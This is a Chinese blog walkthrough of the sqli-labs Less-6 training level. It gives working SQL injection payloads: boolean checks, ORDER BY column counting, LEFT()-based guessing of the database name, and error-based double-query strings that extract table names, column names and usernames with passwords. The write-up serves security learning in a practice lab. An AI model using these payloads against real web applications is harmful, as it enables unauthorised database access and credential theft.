[网络安全]sqli-labs Less-6 解题详析

最新推荐文章于 2024-06-13 09:01:52 发布
最新推荐文章于 2024-06-13 09:01:52 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: 网络安全 # Sqli-Labs靶场攻防实战 文章标签: web安全 数据库 sql sqlilabs
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/131725344
版权

[网络安全]Less-6 Double Injection - Double quotes - String:双注入双引号字符型注入

Less-6 和 Less-5类似,多的姿势不再赘述,自行浏览前文即可。
[网络安全]sqli-labs Less-5 解题详析(秋说的博客)

判断注入类型

GET 1" and "1"="1 回显如下:

在这里插入图片描述

GET 1" and "1"="2

在这里插入图片描述

没有回显,说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+,回显如下:

在这里插入图片描述
GET1" order by 4 --+,回显如下:

在这里插入图片描述故注入点为3个

查库名

Payload:GET 1" and left((select database()),1)='a'--+
使用子查询 select database(),该语句可以获取当前数据库名称,并返回该名称的字符串表达式;通过 left() 函数获取数据库名称的首个字符。

left函数

Left函数是一种字符串函数,可以从一个字符串的左侧开始返回指定数量的字符。它的语法如下:

LEFT(str, len)

其中,str 是要截取的字符串,len 是要返回的字符数。

例如,LEFT(‘Hello, world!’, 5) 将返回 Hello,因为它只返回字符串的前5个字符

若1" and left((select database()),1)=‘a’–+查询成功,则回显you are in,即数据库名的首字母为a
因此可用此方法查询出完整的数据库名

我们可得到数据库名的首字母为s

在这里插入图片描述
继续猜第二个字母,将sa遍历到se,发现se回显成功
?id=1" and left((select database()),2)='se'--+

在这里插入图片描述
因此我们可以不断尝试得到数据库名:

在这里插入图片描述

也可使用抓包字典爆破来获取数据库名,详情参见[网络安全]sqli-labs Less-5 解题详析(秋说的博客)

也可使用双查询注入来获取数据库名,详情参见上面这个链接。

示例如下:

在这里插入图片描述

查表名

双查询注入:1" union select 1, count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema = 'security'), floor(rand(0)*2)) a from information_schema.tables group by a %23

在这里插入图片描述
回显四个表名

查users表的列名

双查询注入:1" union select 1, count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) a from information_schema.tables group by a %23

在这里插入图片描述

查字段

双查询注入:1" union select 1, count(*), concat((select concat(username,':',password) from users limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a %23

在这里插入图片描述
将limit中的0改为1、2、3…即可:

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-6 解题详析,后续将分享[网络安全]sqli-labs Less-7 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。

秋说
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs——lesson6
weixin_62281892的博客
06-29 311
lesson6
sqli-labs通关攻略教程六(less26~less28a)
m0_55854679的博客
07-21 813
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sqli-labs 六至十关
2202_75317918的博客
04-09 911
sqli-labs 六至十关
SQL——labs第5、6关(报错注入)
m0_72471814的博客
07-27 135
第二步:正确之后页面只有一个you are in。第六步:爆破账号密码。
sqli-labs-less-6 解题全过程
yzcn
10-28 308
该题与less-5类似,只是注入点有点不同,解题方法一致。 less-5:https://blog.csdn.net/qq_46432288/article/details/109295457 判断注入点: http://127.0.0.1/sqli-labs-master/Less-6/?id=1 显示正确,you are in… http://127.0.0.1/sqli-labs-master/Less-6/?id=1’ 显示正确 http://127.0.0.1/sqli-labs-master
[网络安全]sqli-labs Less-26a 解题详析
等风来
10-21 2006
这一关sql语句执行抛出错误后并不在页面输出,所以排除报错注入。可猜测后端查询语句为。
[网络安全]sqli-labs Less-18 解题详析
等风来
07-29 2392
以上为[网络安全]sqli-labs Less-18 解题详析,考察报错注入及相关函数的使用;后续将分享 [网络安全]sqli-labs Less-19 解题详析。我是秋说,我们下次见。
网络安全]sqli-labs Less-8 解题详析
等风来
07-23 2330
以上为[网络安全]sqli-labs Less-8 解题详析,后续将分享[网络安全]sqli-labs Less-9 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
[网络安全]sqli-labs Less-15 解题详析
等风来
07-24 2434
以上为[网络安全]sqli-labs Less-15 解题详析,后续将分享[网络安全]sqli-labs Less-16 解题详析我是秋说,我们下次见。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
国内外网络安全现状分析
waitaikong_的博客
06-10 443
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 326
网络安全管理组织架构复习
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 527
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全 - ARP 欺骗原理+实验
最新发布
z339521的博客
06-13 1104
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1357
web攻击的本质,就是通过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值